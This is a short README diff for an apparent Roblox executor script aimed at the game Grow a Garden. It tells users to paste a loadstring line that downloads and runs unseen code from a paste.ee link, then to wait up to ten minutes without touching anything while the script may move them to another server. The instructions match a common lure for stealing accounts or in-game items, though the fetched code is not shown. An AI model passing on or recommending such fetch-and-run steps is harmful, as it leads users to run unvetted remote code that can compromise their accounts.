NekoNekoBeam/Delta-X-Setup/README.md

 Copy this script:
 loadstring(game:HttpGet("https://paste.ee/r/45uZiHB9"))()

-And when you have all the requirements met AND you copied the script to the copybox, press 2nd button (with the joystick) You can either press on the "thank you for using delta" to put the code and press execute, OR you can press "execute clipboard"
+And when you have all the requirements met AND you copied the script to the clipboard, press 2nd button (with the joystick) You can either press on the "thank you for using delta" to put the code and press execute, OR you can press "execute clipboard"
 After you executed it, the script will start to load (it can also teleport you to other server of grow a garden, just dont touch anything)
 Even if you didnt teleported, dont touch anything.
 The script loades from 1 to 10 minutes, depends on what device you're using (and the internet)